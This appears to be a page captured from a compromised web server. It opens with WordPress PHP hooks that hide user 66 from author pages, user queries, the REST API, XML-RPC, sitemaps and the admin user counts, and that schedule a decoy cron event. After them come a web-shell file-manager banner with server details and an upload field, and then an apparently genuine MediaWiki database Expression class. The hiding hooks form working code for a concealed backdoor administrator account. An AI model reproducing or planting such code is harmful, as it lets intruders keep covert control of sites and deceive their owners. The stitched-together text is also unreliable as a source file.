add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/libs/rdbms/expression/ |
Upload File : |
<?php
namespace Wikimedia\Rdbms;
use InvalidArgumentException;
use LogicException;
use Wikimedia\Rdbms\Database\DbQuoter;
/**
* A composite leaf representing an expression.
*
* @since 1.42
*/
class Expression implements IExpression {
private string $field;
private string $op;
/** @var ?scalar|RawSQLValue|Blob|LikeValue|non-empty-list<scalar|Blob> */
private $value;
/**
* Store an expression
*
* @param string $field
* @param-taint $field exec_sql
* @param string $op One of '>', '<', '!=', '=', '>=', '<=', IExpression::LIKE, IExpression::NOT_LIKE
* @phan-param '\x3E'|'\x3C'|'!='|'='|'\x3E='|'\x3C='|'LIKE'|'NOT LIKE' $op
* @param-taint $op exec_sql
* @param ?scalar|RawSQLValue|Blob|LikeValue|non-empty-list<scalar|Blob> $value
* @param-taint $value escapes_sql
* @internal Outside of rdbms, Use IReadableDatabase::expr() to create an expression object.
*/
public function __construct( string $field, string $op, $value ) {
if ( !in_array( $op, IExpression::ACCEPTABLE_OPERATORS ) ) {
throw new InvalidArgumentException( "Operator $op is not supported" );
}
if (
( is_array( $value ) || $value === null ) &&
!in_array( $op, [ '!=', '=' ] )
) {
throw new InvalidArgumentException( "Operator $op can't take array or null as value" );
}
if ( is_array( $value ) ) {
if ( !$value ) {
throw new InvalidArgumentException( "The array of values can't be empty" );
} elseif ( !array_is_list( $value ) ) {
throw new InvalidArgumentException( "The array of values must be a list" );
} elseif ( in_array( null, $value, true ) ) {
throw new InvalidArgumentException( "NULL can't be in the array of values" );
}
}
if ( in_array( $op, [ IExpression::LIKE, IExpression::NOT_LIKE ] ) && !( $value instanceof LikeValue ) ) {
throw new InvalidArgumentException( "Value for 'LIKE' expression must be of LikeValue type" );
}
if ( !in_array( $op, [ IExpression::LIKE, IExpression::NOT_LIKE ] ) && ( $value instanceof LikeValue ) ) {
throw new InvalidArgumentException( "LikeValue may only be used with 'LIKE' expression" );
}
$field = trim( $field );
if ( !preg_match( '/^[A-Za-z\d\._]+$/', $field ) ) {
throw new InvalidArgumentException( "$field might contain SQL injection" );
}
$this->field = $field;
$this->op = $op;
$this->value = $value;
}
/**
* @param string $field
* @param-taint $field exec_sql
* @param string $op One of '>', '<', '!=', '=', '>=', '<=', IExpression::LIKE, IExpression::NOT_LIKE
* @phan-param '\x3E'|'\x3C'|'!='|'='|'\x3E='|'\x3C='|'LIKE'|'NOT LIKE' $op
* @param-taint $op exec_sql
* @param ?scalar|RawSQLValue|Blob|LikeValue|non-empty-list<scalar|Blob> $value
* @param-taint $value escapes_sql
* @phan-side-effect-free
*/
public function and( string $field, string $op, $value ): AndExpressionGroup {
$exprGroup = new AndExpressionGroup( $this );
return $exprGroup->and( $field, $op, $value );
}
/**
* @param string $field
* @param-taint $field exec_sql
* @param string $op One of '>', '<', '!=', '=', '>=', '<=', IExpression::LIKE, IExpression::NOT_LIKE
* @phan-param '\x3E'|'\x3C'|'!='|'='|'\x3E='|'\x3C='|'LIKE'|'NOT LIKE' $op
* @param-taint $op exec_sql
* @param ?scalar|RawSQLValue|Blob|LikeValue|non-empty-list<scalar|Blob> $value
* @param-taint $value escapes_sql
* @phan-side-effect-free
*/
public function or( string $field, string $op, $value ): OrExpressionGroup {
$exprGroup = new OrExpressionGroup( $this );
return $exprGroup->or( $field, $op, $value );
}
/**
* @param IExpression $expr
* @return AndExpressionGroup
* @phan-side-effect-free
*/
public function andExpr( IExpression $expr ): AndExpressionGroup {
$exprGroup = new AndExpressionGroup( $this );
return $exprGroup->andExpr( $expr );
}
/**
* @param IExpression $expr
* @return OrExpressionGroup
* @phan-side-effect-free
*/
public function orExpr( IExpression $expr ): OrExpressionGroup {
$exprGroup = new OrExpressionGroup( $this );
return $exprGroup->orExpr( $expr );
}
/**
* @internal to be used by rdbms library only
* @return-taint none
*/
public function toSql( DbQuoter $dbQuoter ): string {
if ( is_array( $this->value ) ) {
if ( count( $this->value ) === 1 ) {
$value = $this->value[0];
if ( $this->op === '=' ) {
return $this->field . ' = ' . $dbQuoter->addQuotes( $value );
} elseif ( $this->op === '!=' ) {
return $this->field . ' != ' . $dbQuoter->addQuotes( $value );
} else {
throw new LogicException( "Operator $this->op can't take array as value" );
}
}
$list = implode( ',', array_map( static fn ( $value ) => $dbQuoter->addQuotes( $value ), $this->value ) );
if ( $this->op === '=' ) {
return $this->field . " IN ($list)";
} elseif ( $this->op === '!=' ) {
return $this->field . " NOT IN ($list)";
} else {
throw new LogicException( "Operator $this->op can't take array as value" );
}
}
if ( $this->value === null ) {
if ( $this->op === '=' ) {
return $this->field . " IS NULL";
} elseif ( $this->op === '!=' ) {
return $this->field . " IS NOT NULL";
} else {
throw new LogicException( "Operator $this->op can't take null as value" );
}
}
if ( $this->value instanceof LikeValue ) {
// implies that `op` is LIKE or NOT_LIKE, checked in constructor
return $this->field . ' ' . $this->op . ' ' . $this->value->toSql( $dbQuoter );
}
return $this->field . ' ' . $this->op . ' ' . $dbQuoter->addQuotes( $this->value );
}
/**
* @internal to be used by rdbms library only
*/
public function toGeneralizedSql(): string {
return $this->field . ' ' . $this->op . ' ?';
}
}